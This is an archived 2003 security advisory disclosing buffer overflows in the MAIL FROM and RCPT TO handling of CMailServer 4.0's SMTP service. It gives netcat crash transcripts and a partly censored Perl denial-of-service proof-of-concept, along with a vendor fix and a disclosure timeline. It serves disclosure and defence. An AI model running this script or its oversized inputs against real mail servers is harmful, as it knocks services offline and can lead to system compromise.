Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: bt157.txt

CMailServer 4.0 Multiple Buffer Overflow Vulnerabilities





                    Multiple Buffer Overflow Vulnerabilities
                          Found in CMailServer 4.0
                         http://www.youngzsoft.com
                        =20
                          Discovered by Dennis Rand
                             www.Infowarfare.dk
------------------------------------------------------------------------


-----[SUMMARY
CMailServer, a small and easy to administer email server software and =
web=20
mail server software, can help you build your own email server for=20
Win NT/2000/XP. It enables you to send and receive email across the=20
Internet or within your LAN. The ESMTP authentication, ASP form web=20
mail and multiple domain names are supported.=20

CMailServer offers an unlimited email users license at a reasonable=20
and affordable price compared to other email server software.=20
For those small to medium sized companies, CMailServer will be an=20
economic and effective solution to handle their e-mail management=20
requirements. CMailServer also is a web mail server software and=20
provides full web mail service. The web mail is based on ASP.=20
You can customize your web mail interface freely. Give it a try=20
and find out how easy it is to build an email server and web mail=20
server for your own business.


The problem is a Buffer Overflow in the SMTP protocol, within the=20
ESMTP CMailServer 4.0.2002.11.24 SMTP Service, causing the service to
shutdown.
It is possible to actually overwrite the exception handler on the stack
allowing=20
A system compromise with code execution running as SYSTEM.


-----[AFFECTED SYSTEMS
Vulnerable systems:
 * ESMTP CMailServer 4.0.2003.03.27 SMTP Service

Immune systems:
 * ESMTP CMailServer 4.0.2003.03.30 SMTP Service

-----[SEVERITY
High - 	      An attacker is able to cause a DoS attack on the SMTP
protocol.
              And we can actually overwrite the exception handler on the
stack=20
              Allowing a system compromise with code execution running =
as
SYSTEM.
             =20

-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The Vulnerability is a Buffer Overflow in the ESMTP CMailServer
4.0.2002.11.24 SMTP Service
When a malicious attacker sends a large amount into the "MAIL FROM" and =
the
"RCPT TO"
The buffer will overflow. If the code was carefully crafted, attackers =
could
execute=20
Arbitrary command in system privilege.

The following transcript demonstrates a sample exploitation of the=20
Vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>

The same Vulnerability is in the RCPT TO
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>
----------------------------- [Transcript] -----------------------------

----------------------------- [Exploit Code] =
-----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the=20
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on =
the
stack allowing=20
# A system compromise with code execution running as SYSTEM.
#=20
#
# Ive censored some of the source code out. =3D)
#
# Solution:=20
# None at this time
#=20
#

use IO::Socket;
   =20
$target =3D shift() || "warlab.dk";
my $port =3D 25;
my $Buffer =3D "A" x <CENSORED> ; #=20


my $sock =3D IO::Socket::INET->new (
                                    PeerAddr =3D> $target,
                                    PeerPort =3D> $port,
                                    Proto =3D> 'tcp'
                                 ) || die "could not connect: $!";

my $banner =3D <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp =3D <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp =3D <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
----------------------------- [Exploit Code] =
-----------------------------



-----[DETECTION
ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
above-described attacks.=20
Earlier versions may be susceptible as well. To determine if a specific=20
implementation is vulnerable, experiment by following the above =
transcript.=20


-----[WORK AROUNDS
Upgrade as soon as possible to version -> ESMTP CMailServer =
4.0.2003.03.30
SMTP Service
or later.=20
The other workaround is to disable the SMTP service but that is not fun.

-----[VENDOR RESPONSE
Quoting YoungZSoft <yaoer@youngzsoft.com>:
I thank you very very much for your report.
We will fix this as soon as possible
Yaoer

-----[DISCLOSURE TIMELINE
24/04/2003 Found the Vulnerability, and made an analysis.
29/04/2003 Contacted Vendor at support@youngzsoft.net=20
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by <der@infowarfare.dk> =
Dennis
Rand

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of =
any
kind.=20
In no event shall we be liable for any damages whatsoever including =
direct,
indirect,=20
incidental, consequential, loss of business profits or special damages.=20





TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH